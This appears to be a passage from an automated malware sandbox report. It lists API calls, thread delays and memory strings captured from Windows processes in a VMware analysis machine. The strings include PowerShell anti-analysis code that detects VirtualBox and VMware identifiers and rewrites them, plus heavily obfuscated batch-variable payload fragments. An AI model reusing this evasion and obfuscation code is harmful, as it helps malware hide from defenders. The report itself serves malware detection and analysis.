        Source: C:\Windows\System32\svchost.exeCode function: 18_2_000001AD09EAF3E8 FindFirstFileExW,FindNextFileW,FindClose,FindClose,18_2_000001AD09EAF3E8
        Source: C:\Windows\System32\svchost.exeCode function: 18_2_000001AD09EAF264 FindFirstFileExW,18_2_000001AD09EAF264
        Source: C:\Windows\System32\svchost.exeCode function: 19_2_0000020EC013F264 FindFirstFileExW,19_2_0000020EC013F264
        Source: C:\Windows\System32\svchost.exeCode function: 19_2_0000020EC013F3E8 FindFirstFileExW,FindNextFileW,FindClose,FindClose,19_2_0000020EC013F3E8
        Source: C:\Windows\System32\svchost.exeCode function: 20_2_00000229EA6AF3E8 FindFirstFileExW,FindNextFileW,FindClose,FindClose,20_2_00000229EA6AF3E8
        Source: C:\Windows\System32\svchost.exeCode function: 20_2_00000229EA6AF264 FindFirstFileExW,20_2_00000229EA6AF264
        Source: C:\Windows\System32\svchost.exeCode function: 21_2_000001777BDCF264 FindFirstFileExW,21_2_000001777BDCF264
        Source: C:\Windows\System32\svchost.exeCode function: 21_2_000001777BDCF3E8 FindFirstFileExW,FindNextFileW,FindClose,FindClose,21_2_000001777BDCF3E8
        Source: C:\Windows\System32\svchost.exeCode function: 22_2_000001590E6BF264 FindFirstFileExW,22_2_000001590E6BF264
        Source: C:\Windows\System32\svchost.exeCode function: 22_2_000001590E6BF3E8 FindFirstFileExW,FindNextFileW,FindClose,FindClose,22_2_000001590E6BF3E8
        Source: C:\Windows\System32\svchost.exeCode function: 23_2_0000021C29A6F3E8 FindFirstFileExW,FindNextFileW,FindClose,FindClose,23_2_0000021C29A6F3E8
        Source: C:\Windows\System32\svchost.exeCode function: 23_2_0000021C29A6F264 FindFirstFileExW,23_2_0000021C29A6F264
        Source: C:\Windows\System32\svchost.exeCode function: 24_2_00000276D72CF264 FindFirstFileExW,24_2_00000276D72CF264
        Source: C:\Windows\System32\svchost.exeCode function: 24_2_00000276D72CF3E8 FindFirstFileExW,FindNextFileW,FindClose,FindClose,24_2_00000276D72CF3E8
        Source: C:\Windows\System32\svchost.exeCode function: 25_2_0000021D846CF3E8 FindFirstFileExW,FindNextFileW,FindClose,FindClose,25_2_0000021D846CF3E8
        Source: C:\Windows\System32\svchost.exeCode function: 25_2_0000021D846CF264 FindFirstFileExW,25_2_0000021D846CF264
        Source: C:\Windows\System32\svchost.exeCode function: 26_2_0000025BFDA9F3E8 FindFirstFileExW,FindNextFileW,FindClose,FindClose,26_2_0000025BFDA9F3E8
        Source: C:\Windows\System32\svchost.exeCode function: 26_2_0000025BFDA9F264 FindFirstFileExW,26_2_0000025BFDA9F264
        Source: C:\Windows\System32\svchost.exeCode function: 27_2_000001691456F264 FindFirstFileExW,27_2_000001691456F264
        Source: C:\Windows\System32\svchost.exeCode function: 27_2_000001691456F3E8 FindFirstFileExW,FindNextFileW,FindClose,FindClose,27_2_000001691456F3E8
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
        Source: svchost.exe, 00000018.00000002.2766065494.00000276D6FD0000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: VMwareVirtual disk2.06000c292b65879ff477a6af604113f58PCI Slot 32 : Bus 2 : Device 0 : Function 0 : Adapter 0 : Port 0 : Target 0 : LUN 0PCI\VEN_1000&DEV_0054&SUBSYS_197615AD&REV_01\3&218e0f40&0&00
        Source: svchost.exe, 00000027.00000002.2725737167.000002724022B000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: &@\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
        Source: svchost.exe, 00000018.00000000.1652208283.00000276D756B000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: VMware SATA CD00
        Source: svchost.exe, 00000015.00000002.2820290178.000001777BFFA000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: zSCSI\Disk&Ven_VMware&Prod_Virtual_disk\4&1656f219&0&000000_0r
        Source: svchost.exe, 00000018.00000000.1652208283.00000276D756B000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: NECVMWarVMware SATA CD00
        Source: svchost.exe, 00000018.00000000.1652208283.00000276D756B000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: LSI_SASVMware Virtual disk 6000c2942fce4d06663969f532e45d1a
        Source: svchost.exe, 00000027.00000002.2730575033.0000027240278000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: NTFS;;SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&000000
        Source: svchost.exe, 00000027.00000000.1719652960.0000027240302000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\SCSI#Disk&Ven_VMware&Prod_Virtual_disk#4&1656f219&0&000000#{53f56307-b6bf-11d0-94f2-00a0c91efb8b}
        Source: svchost.exe, 00000018.00000003.1776507720.00000276D75C6000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: VMwareVirtual disk6000c2942fce4d06663969f532e45d1ap
        Source: svchost.exe, 00000018.00000002.2870533670.00000276D7F00000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: VMware Virtual disk 2.0 6000c2942fce4d06663969f532e45d1aPCI\VEN_1000&DEV_0054&SUBSYS_197615AD&REV_01\3&218E0F40&0&00NTFS
        Source: svchost.exe, 00000018.00000002.2880127220.00000276D915C000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: $value = $pr.Value.replace("VBOX", $value).replace("VBox", $value).replace("VMWARE", $value).replace("VMware Virtual disk", $value).replace("VMware", $value).replace("HARDDISK", "WDC").replace("VIRTUAL_DISK", $value)
        Source: svchost.exe, 00000018.00000000.1657687966.00000276D90CE000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: VMCI: Using capabilities (0x1c).
        Source: svchost.exe, 00000018.00000002.2880127220.00000276D915C000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: $value = $pr.Value.replace("VEN_80EE", $value).replace("VEN_15AD", $value).replace("VBOX", $value).replace("VBox", $value).replace("VMWARE", $value).replace("82801FB", $value).replace("82441FX", $value).replace("82371SB", $value).replace("OpenHCD", $value).replace("VMWare", $value).replace("VMware", $value)
        Source: svchost.exe, 00000018.00000002.2766065494.00000276D6FD0000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: VMwareVirtual disk6000c292b65879ff477a6af604113f58
        Source: svchost.exe, 00000027.00000002.2725737167.000002724022B000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\SCSI#Disk&Ven_VMware&Prod_Virtual_disk#4&1656f219&0&000000#{53f56307-b6bf-11d0-94f2-00a0c91efb8b}1e
        Source: svchost.exe, 0000000F.00000000.1585342930.000001A53EA13000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\4&224F42EF&0&000000Xt
        Source: powershell.exe, 00000008.00000002.2808227707.0000020D08152000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: %PpkoPnXtpcwQKZraSOelGBuXOHvkiGVrdITaclAcgtdJleujVPPIpUMoUnzhRMkJgfNbgrYHncenxLMKnmp% "w%ICAyvGHdcmVRlPEwkeMWqNlykQaXnzBtIPeOokGtEOQrwmPf%J%nfmQDODVqcnEFKPDKCiwLPhZxtrCWUcYbVJimLPUlixmWbOU%s%YmGTestyXmskwbZwapCJaHrYNokDrUdwEwDKniUJClkZsFxk%J%jbmHyeUrVHgPhQgdjWFZxoiRvThOwrGhQaupIwXAClOFbeCM%N%ehPvZxMUTulFWfVEbYYgvQuNYexmACQrrvJoCkitoAwoksEx%r%qkEcfvqoNbwUaAtqEUoAvGbQQFSVugDGAZVpYNmVfvBANnsO%P%gfKqedcKiNmzCuUGyQtbEesQHsvZeBdCnePowmCxXlhkAMtK%I%BUbXTrjcMTIMHcFGKJlxFFkloWdsWiqVZLyjzfIWUNBDEPPU%c%GAAQBVfVKQIXnRfECNNWEvgEbpDSeHHygjMwHzudGCzJxLId%a%HWaQcTqktWPlsmRdikQeeJWdtJqcVxhpGzkhGRvnSBcLKiLt%m%KwBmUEZYZWxtCopWPzFTcJwrOClDGltkXXrzVUvbzlhJtcLE%S%mgWkDSqbakyrtwrODmvFWPaUeDtQBMXLRGqAoiHfGqyLvdId%S%TtghHfHwfbgZzzzomMzMfRzuEqYGrpybVpWiFQeMZTvmcIGg%D%QkyJDWXcTLCrhafPDeejDqIvINNlwmrWKRPgQPxZrUoUoMEY%r%OFJXDwDACcaPiMGGtFHplYZNHfSIbNhViOxQDusnopENPIQF%d%oHAIfpNPGWqyDVyOVeGuoPdZmtbVulYYpmutmyQTbHkGdUJs%a%RPSKbwqyEBvMoRuuYrjrBeBwoNsGFxWsJIeFtnXSVVPLdeFj%U%nQILKsRMnvvodKThFccFNPbKuqvFoQtkhitOOkIrQrrXRJOl%R%cIgabZwxPXrtXmxxclgVqesuuLPvxdTLBkDGJsjiLVZRTpuE%B%TTUGDTUXpMGqjaZLdGRNJROJcXjveAAerlBDiniIpFqXMSYK%x%VoNnxHUcfkDFKzSOlBYYzwCQxjxdAQXjYyzQNmHKqzxYJCXQ%U%NBLlTalzLXPojRBpnuGmZbbZToHaYEgVlHpZfLpYmZfPwsAz%q%XiKpWLQLzLrFslBhQUdBBCjCeHZaWlCBNicPTRYzREzttKGb%K%yYZCpYXvZikoMPPnjQRjjMnZVDKXcQiubYBXmalPlGPLGKNb%%AevHhUXunr%t%lkDTwRLLZGMoZsjZQnNnSbjEcYCWBtlQJjRFFAEgQmntzAl%l%oGLPwZNWkaYQypPjGvVEQBDupJHxFOPfBMopQEPQVmGEGKf%e%QadGYDVuMdqzMrprwlTpMbztcFfJEUYOFEQxBhRBFrBmzec% %zGVktMvtPAKEsymQReCTiASPptsJuznTXDFcIKEbklbWRCy%=%ctBKhWlTYOgVZuLYpnQGOSjihABJXyVXMUpqTPgXMKHoBOE% %GymMJbVKjjsDHvCVzSjjefvfAgTUelVGsVUkLMlWQkfhAly%$%BkOiwsFzAdhlChbGYoMlMBrkMGmsUaoEoIsJpcynMvtgDAJ%s%OOEgSNaMaSEvPfmFAPDXUPrqVPyyrhlGlXyEqTvQnWrRKHJ%j%hzPTraDOYxnkdpCuSHXjRGIpHtMJXyAGofqYBoTGIiAgcIs%r%BLByjMxSARAlYoUQAXHVXYDTENrBIgBmYblXwZqTRnPhbcV%S%sOrajvMuDiIUvvVjupnnWdWuAGNeKiwRBSZNqfsRlHHPOeU%;%yVdvSNPYpRXzCHIJvMQsDviSoWwbpvhGwMpiHMDeMUKVtGP%"
        Source: svchost.exe, 00000018.00000003.1776507720.00000276D75C6000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: VMwareVirtual disk6000c292b65879ff477a6af604113f588
        Source: svchost.exe, 00000018.00000002.2746085607.00000276D6A2B000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: @vmci
        Source: powershell.exe, 00000008.00000002.2808227707.0000020D08152000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: %PpkoPnXtpcwQKZraSOelGBuXOHvkiGVrdITaclAcgtdJleujVPPIpUMoUnzhRMkJgfNbgrYHncenxLMKnmp% "m%NxvZvnOFuKyQjsKIwbKIPavcmazPKpVMzmTTRRSiUizhRF%Q%JZMOrkSlSNbtMuNYVfOLrWyQREjBOGAolHrAdWXLTougRx%o%exvVnusfnMAVWMbqwlmNifdnVYidRdCsYtzLgStfVftFZh%w%ZkJDRiTepZuiaompokjiWDnpjDRgScLxnNZXtoltyUeArY%I%SfTFQivRlwXttnrMmmoWUmooWaZQJbzNYlLMnmlCbvCCaZ%O%UXcLIRludGQEJQjFhjXkviCEzZaMVzJLnWfcNXtHBEhfVI%U%DvswntFQEMuxmJQzyEWeqMLhRkPpIQaxJQvFtylpgxssHq%R%LKRcfCiQsRKlEdEpiOLXOwnkfatHYTtsAByfxFKypSyEVi%p%UhLRoEGKBoxHWfiASyxrLdEyRCdnHWYIoXflWgEPMPajIQ%w%IEpOZZhEwRDmZMAtcEqOsZZXELUIFVduQbTyXSXZAKAoIJ%T%hSosNvTTxJEsknezZBNivXScwjHroIyLoUDctmiHBXEkUF%r%IJUbLZAAnkZmWDNBFPkTdpJcfMsgGytIhQBYxmWykOHtch%x%qFTarOZaBsZRVYHuTOQrefbPesSLJpIqZXwNmGhEIhpiYF%w%qXRPUSCLdkEeWYVnqlKJRXCUinHlIWPSQycUUTvQNoUljh%O%KiJvQeypNsvXHGkqdgvLnxWbtxPUWDdrLaDzCngKuBKJzW%m%mPFwlNPxTmlHbtpDskpdmHdLNPaKqMNnBxlaoArpBngqnV%D%mMvQjzuwJFMUIvNfhhzYgEippSTZBZAMxSDnozDnTfNFnt%U%RVCwfZRoOHEgBqGuUKeaxPSzQHElfbQCbVaXxeTAUieVJi%%bhkrSvMNS%f%mGykdAnWcdcFyvFjNRbeFqIWQQEfoLWPIJrEHQMbNZXUuyvfo%"
        Source: svchost.exe, 00000018.00000000.1652208283.00000276D756B000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: nonicNECVMWarVMware SATA CD00
        Source: svchost.exe, 00000018.00000003.1776507720.00000276D75C6000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: VMwareVirtual disk6000c2942fce4d06663969f532e45d1a@
        Source: svchost.exe, 00000018.00000000.1651889692.00000276D74D6000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: vmcir:m
        Source: powershell.exe, 00000008.00000002.2808227707.0000020D08152000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: %RnbjWFfOMtkuiuCfrscEQiumPzRiBOTFxRSTdEfBlkUUSKfciGtUjLCITPtxNWnXzEXqBJbNnBsGnzueuOa% "A%bfieItepbjsbjRyhUNfJwmYrYXTxjbYFdvpLZclT%r%bhYoPClJQFavpSIPgQfLzHgZkMXOBNiRBmIooJCw%Q%LkHEbDqlMzEiXAttbYecExhcxiTckuAxoJZpaCYG%h%wMbbiZUbTomqFzRocEgTKnasZhTnAdtzZxFSvgUx%g%nRjVhkSPSKnvvfWjLJcbfHBPVNqiTZTVKIFTdflO%U%pevPQXeUAwhMdSsGquauTKVSRrLMAdfFynMalLZX%m%IwHxSgSRqYCJfQVEjCYylrtxqBoPgrvFvcLxdyaK%g%zUvCAwAHshRJNBLrcjgqScLZCXncfxBKBnYrVRXU%x%aGxYzMRUrtuTsKRxjwZDiyCUFhhzCuvkmlqlEMAQ%Z%ftKLdIsRvAizStLCeCsrEsrXYkHgtGTwWixPNQRX%y%PpeclWsSANhcuilNcNNSalxPHLCJWWPoKuCpooLb%h%ROGGyQbOXKMZdYXDSovztIWDYSrZFWzNbLbmFRqQ%D%KOMmkPkLxYwZTlHiScIGzbiakYYrXLYaYEPFWKtj%v%IFCGzAUQdStCjKqIFLblRTOMavbovclhJzXUzBAK%A%einfrwRnohZlJisORQGdyFubGmTKMwjdkqhJFIuD%p%ENaocayBhjdIVxmzNmzfChARYVasaIjivczKEgYF%N%NsCDsAiNeHVtjpawnjphagAyZUmSXBUHnTrkEXyx%U%NmotNQYgbdxvQRFHSeEynqQDNnfqXQRpKRtNRgKi%j%VgQUdzRvnKsztakxwKFzKIilliKYxSPLuvCgzWzn%v%wJcnyrWJHWqhAkxnYFIVOSXvVGfXydXAksdaGVNU%C%lbrBCIkjXpiTnEzEMHrRmYlEYPWihwGdSOJNBwTn%%NfOpbSjnDHI%S%VajUdmGTzoZDVImQNCMLbcAIfbzULcpOeuqYbJVCppHi%s%HAWfxWOUgBuSzAPcNLhwZlyBroOdHjwMusbFftxOouHD%R%ZxyAUSPDhliwbvOiiKnXfIxhzkWtosiEDVBTPnjOtSEj%7%jFDKFoGDhKyraraJWwpPdESgUUsUBzDndoXUGmOZLEwT%;%wjTymzSXCPgEMxPKVMcIgknMtgdJIpdzhYJKbUHcHGKo%'%hsijwddZBONmWhegvipnLHxONfJbeaaAAZEbYUmEldXt%.%lxOTQAGyqxCAVuvrucUBNnLXCdiBWKbHKdCprPlEtCjc%R%wefEyUkijvFXLQrMreBGwVPRRfZERqhleIAyXEdbASyp%e%yEDAyympaDGBooMsVFrTntTdpSPMbzfDwAsmBygtdSkB%p%bZkJSKgUBFbfLAkFJznBxdeNVAQwzYPuisbqIfUqtlcR%l%znBbnBJDEJdYVwNrUJuDPHWszUWDEWhmanoIZPiYolPz%a%ocumsDwJQzbRqiCtEgYIBRXIifseBwoERxdwAJlbAyvB%"
        Source: svchost.exe, 00000018.00000000.1651889692.00000276D7474000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: dowvmci
        Source: svchost.exe, 00000018.00000000.1652208283.00000276D756B000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: VMware
        Source: svchost.exe, 00000018.00000003.1776467589.00000276D7C1E000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: <connect><ver>2</ver><agent><os>Windows</os><osVer>10.0.0.0.19045</osVer><proc>x64</proc><lcid>en-CH</lcid><geoId>223</geoId><aoac>0</aoac><deviceType>1</deviceType><deviceName>VMware20,1</deviceName><followRetry>true</followRetry></agent></connect>
        Source: svchost.exe, 00000018.00000003.1776467589.00000276D7C1E000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: <connect><ver>2</ver><agent><os>Windows</os><osVer>10.0.0.0.19045</osVer><proc>x64</proc><lcid>en-CH</lcid><geoId>223</geoId><aoac>0</aoac><deviceType>1</deviceType><deviceName>VMware20,1</deviceName><followRetry>true</followRetry></agent></connect>ati
        Source: svchost.exe, 00000018.00000000.1650770311.00000276D6A2B000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000018.00000002.2746085607.00000276D6A2B000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: @Microsoft-Windows-Hyper-V-Hypervisoron
        Source: svchost.exe, 00000018.00000000.1652208283.00000276D756B000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: nonicVMware Virtual disk 6000c292b65879ff477a6af604113f58
        Source: svchost.exe, 0000000F.00000002.2719299126.000001A53EA2A000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&000000`y
        Source: svchost.exe, 00000018.00000002.2880127220.00000276D915C000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: if(($pr.Name -eq "Caption" -or $pr.Name -eq "Name" -or $pr.Name -eq "PNPDeviceID" -or $pr.Name -eq "AdapterCompatibility" -or $pr.Name -eq "Description" -or $pr.Name -eq "InfSection" -or $pr.Name -eq "VideoProcessor") -and ($pr.Value -match 'VBOX' -or $pr.Value -match 'VBox' -or $pr.Value -match 'VMWARE' -or $pr.Value -match 'VirtualBox' -or $pr.Value -match 'VMware' -or $pr.Value -match 'Oracle Corporation' -or $pr.Value -match 'Microsoft Basic Display Adapter'))
        Source: svchost.exe, 00000027.00000000.1719652960.0000027240302000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
        Source: svchost.exe, 00000027.00000002.2725737167.000002724022B000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&000000,@
        Source: svchost.exe, 00000018.00000002.2880127220.00000276D915C000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: if(($pr.Name -eq "DeviceId" -or $pr.Name -eq "Caption" -or $pr.Name -eq "Name" -or $pr.Name -eq "PNPDeviceID" -or $pr.Name -eq "Service" -or $pr.Name -eq "Description") -and ($pr.Value -match 'VEN_80EE' -or $pr.Value -match 'VEN_15AD' -or $pr.Value -match 'VBOX' -or $pr.Value -match 'VBox' -or $pr.Value -match 'VMWARE' -or $pr.Value -match 'VMWare' -or $pr.Value -match 'VMware' -or $pr.Value -match '82801FB' -or $pr.Value -match '82441FX' -or $pr.Value -match '82371SB' -or $pr.Value -match 'OpenHCD'))
        Source: svchost.exe, 00000027.00000000.1719652960.0000027240302000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
        Source: svchost.exe, 00000018.00000002.2870533670.00000276D7F00000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: VMware Virtual disk 2.0 6000c292b65879ff477a6af604113f58PCI\VEN_1000&DEV_0054&SUBSYS_197615AD&REV_01\3&218E0F40&0&00NTFS
        Source: svchost.exe, 00000027.00000002.2727540378.0000027240240000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: (@SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\4&224F42EF&0&000000
        Source: lsass.exe, 0000000E.00000002.2735352658.0000019AB8489000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: pvmicvssNT SERVICE
        Source: powershell.exe, 00000008.00000002.2808227707.0000020D08152000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: %vZwMojZokINoWWunNOByEGHHsWvtupcZWsBAhkcrKNCFNeJqegrGnCqPrOtsOFTVFOrEvUfCMjORdcUomeooXwMubMitRJDeTHaZMfVkaOTdNyMpUfgKrFXibXCILMLcFJY% "X%ZZJyVbdLIYLWVpptQGkSxkOYCNIRuomUsyEiBzRuVqg%N%GjLQtVuYZngSPlLVitlqtMRDxLhSqOPWhehPRXoWapm%w%GmGPWQEJbKZMUritIOCIlxkLLeVelepqezkrQVkbMeO%Y%lhrnxJDFhyHajbUeSUAyXvJIuhRCMEAVhJYEtQyuHyh%c%SwzbpWRrhmGQQxJSqRbSCXLTzdqKcwfQynQlVfCGVnt%O%JASigJYiDFFEUKFBlFgpKhPrCHxXkpvXpEctGUkbenC%F%kTIVBqDqaOYICKAGylaYnkIpqImVquflwEEyTLWHGYu%U%irVAIfoLPdpoaltESdIZGJNlXgcMNossoPzYuhDPcIp%H%hhqEnzgdDXZOyEKCBdBYAKXZlLvkLATXXuFeGCPnGkP%M%upaauKEbLAKOwjqsBeWsdebReYFWZoorpVCKkLazgyh%J%xnFiVqjniKSLqojVvfIcxlszBGGiQdxmFWEDzPKFQag%l%HxjmwaPEtxvJlUgHoKaxemFgtJFwGuclxfKbstjhazd%N%OjnsItivVPCbuScTMvsYYukmgkepUATwFjQWgrWcyZh%P%wUdpipAxMIAeuZamyoTBuWgwlbgMuyqAZnNscUWZtdg%F%OeewXffxOExMAOGegjNcorafglIjEsThrPrshFiHpaC%x%VBAnEvQPQFbSweZpLxVTvLquKwoWBagMnPeDFYeNODc%Y%BqWUoiqxkuggklgChhTnQzoEGZvJNthfRIPeOCaOkDW%%WZYeMUZOVhbw%x%gJUszvWGUpmbbrnoMHJRmboBwbOFgfcnDWxXfdjrwBk%"
        Source: svchost.exe, 00000027.00000002.2725737167.000002724022B000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: @\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
        Source: dwm.exe, 00000010.00000000.1593472080.000002382C25F000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: dRomNECVMWarVMware_SATA_CD00
        Source: powershell.exe, 00000008.00000002.2808227707.0000020D08152000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: %RnbjWFfOMtkuiuCfrscEQiumPzRiBOTFxRSTdEfBlkUUSKfciGtUjLCITPtxNWnXzEXqBJbNnBsGnzueuOa% "w%JGczmXMMGgJMHRwmwmgjaHNDERgyfAqMxwccjcztWTLgPw%Y%psOLMqDsHcTzVvRoGgQXolPtdtNNngVGNiBOKtNZifOaiJ%d%gdCHmFqRheDvIsCQeAgmMNTcEmsQOjwOktnJkFUqqVaxko%L%LvxsaoTWXtkzdamzdXHOkofTFzGQWQMwSpBXtwjiVowTzL%J%BTdRSdQwewqDMAIcahHNHOypgGOzTWRltUXMNeXJFvleHP%m%JIASopmLdNvOKlorDhFejSDVpVjXhlCuIrXgYaICZIRjrZ%B%uLuoSezCFRfEDtgoDRlbftoisCycfBatEqAxDTtyUfLgau%M%xpvKeZYpTbxlWpFwxdQLanSIKKyMgaHiiYfjGuxbuoxzZs%q%XdTxIHpptjwNZtBljStpdXkvPcGPqLQsIsNvTIraSSEVMT%J%vdzjfEgKpZSyIFbzYIteeHGgsAAtxkspIWHDphFmmYcNCv%F%aMZsUVBIONwtQEdNnfGDPMYxkQchRgESDXAOtepxNahTgV%s%rbiyLXhZFoNBidTtQIjEQSeotiPjPOEfrozbYtvHLErlbS%m%WlDtkyKCfyWUfChXjRJIkTERvxnBTlBSnBmDFwEguOibee%z%nSzNvACsIcHMYMliJTXeHEqDsMmDnvKCMqjucfQaqUSjWT%i%xRVmfpdaxJBWuInZemrfZHDQgDdWOMLhHyovIbqvyMTzSg%W%LhNqQGRRTQoegBlhmKYuoVuSrdVWGnOdXZSWjxWeqQFyhD%j%UPkrziByRPNUZNKVkGbkhgJpXPOTexqVLNigLoNFBzidio%k%xituFYwWwOfUtKtIttySjmEEjWTvJHYFgJrFzJSsyOqtaR%Y%UcmSfOEqfkEPlJebnOQANKsNjKBftuVlDsbQjQCjaQDgbJ%i%yinxBCDAdkKyJvnzWKptmTInRwmHzXhlLzmsRWStHcoRgK%D%ghVBTSRIwEAZFeqWbgdyNjjUHaSWLkEQhhqeLXdouddHRR%K%rNcLaiNIXXYaUTaUXmZJSxOlkecPeKgBdPJeTZjwczksgK%B%cknzfQHhZTZRAWfYEnRwXfkWaXdDGtmweAbSBEEqUVQPfc%%ejcbCtsBNTje%$%mqeUXBKMXZqyiMeAFGCMZVnxZIACcpuRYyQmCypUtOdS%a%kfvDPukiCpzrdGVoaiJIFzAKVSYhrHslRumTnXMIelpI%o%YyiWDaUleunLFLHXwdRUWnAJubbdvbDtjRLwJbDqNhhw%h%hAoCpPlbuvMLYzCCZRPcQTBOZknuzBgPgdBTNyNGPCZO%N%eaykzbqWseFnZzDeBRBToXEUXIPAdinoUMJYMdUykkxc%=%yoUnVIfYagAhwDmQlQSjQrsmPEsxWcIeACwIOBEvdpnO%u%mCCjQemurnlhVHyrqHbXxwHTgDbKlxfBdEZnciGSQoMm%w%rpNhdnewnqqQUIcncCiTiJdrIlphajhjJvBRQUHYtInM%N%njstgtPnfSdIlwzRXWweihgzhlwhUkAzvqdySWbGtTdQ%e%rTFuvPawmjEgdSlVXHtVsDmUsaYbVQKpepinFcMejenl%u%MXvaKgJMAhyNGKbvQZAvzobNKYpUVoMnqbhvFYrPgYPX%w%RuGUarnkDRMxVIpLQOQlulxFDFPSHLoBzeWpruUEaCJy%"
        Source: dwm.exe, 00000010.00000000.1592705358.0000023829B56000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\4&224F42EF&0&000000/Y
        Source: powershell.exe, 00000008.00000002.2808227707.0000020D08152000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: %RnbjWFfOMtkuiuCfrscEQiumPzRiBOTFxRSTdEfBlkUUSKfciGtUjLCITPtxNWnXzEXqBJbNnBsGnzueuOa% "A%YBhuzNxhDIWRFccEMqlqCWowPClPWNpUXllRsinefup%C%FPvWHVhPguzQcnLEWCIlPscTuQkmEdhkiGIGuGDUPYj%M%zyujEHDqCxiAmNBBQKUldnoIvEekqYNwRjDvZHFEaMF%R%MZgvTSeMjUNgmjMNaDtaDJLIdjgBjepkqICIpjkrmmE%D%CedrmnTFbHMbcnxsKMCDeECPDHeyQscNrfjEZSUopyn%B%DEGzuRRAEJIzXBnNEjvOJFYJXeSsRSnnGqZlXhJGZSx%T%eIGldMfpfUJEXGXCqZyJLvvTHCcPwzOPQhUaqSPGLDi%o%sWLbFaFtHBjLInNEBJpSGgUNQLWlxkSXincXVAxPRfh%M%oHvmMDnnWwKCmbXlTdtVxIlDulPJamzbAZGguzjIkWV%m%BxLPVXpEMxjJFwSRANDnKWJcnuRQtULLAMKfJwUMLHN%C%DqpaJBIIUGJlFNJCAfykRLyjSMMheTRBcifLYuipLmR%K%eRBfsaUtHmxWSRghXOADbPhiwHXEgXjzFUurrHuhkAj%Y%oFmnURmkAkIQoJsIKdqmKdXqYxOQquttAGSDkucMUMI%M%pWdfHZYKdTnzlIVoxdvTgQopIRPypaErXuIuUrgRsJp%C%zmgHVogFJySCyIOxQkzvdpWBRaBtfWEBwBOcBkTkjuU%w%SfSjMgTqGSomkqFQVNMANUqfXTLVGqplIudwYQPnlFX%G%JioELWtYwwUhYOMlSuYJqDcDPniReXzohWHXIoZZmrS%P%POmeHmEWSnWHgfKPyNCTzXGacgODEvZwYKnPCjBEzbH%%hvWsmWze%E%koBSXyBlKxtRhmbAybrwozIvRVmpmYuxqFQNFWFf%x%TNMBqvHqhagyJkMLGfacmmYLdVBCvnVBvmCAMgev%p%nWhlRVNgTehzVDTHPaxuUfUTfEcxHlYzbEOqeMUi%r%ivIrgvGSsVLMJJBibogmSpyIgHyqODDcgpmzwDMJ%e%YjfMAmQrdFoQGHpSWakzXpePrIFuxcMxBwoJkMhU%s%QgnjoNwyZuCvsnMJfpuRGwU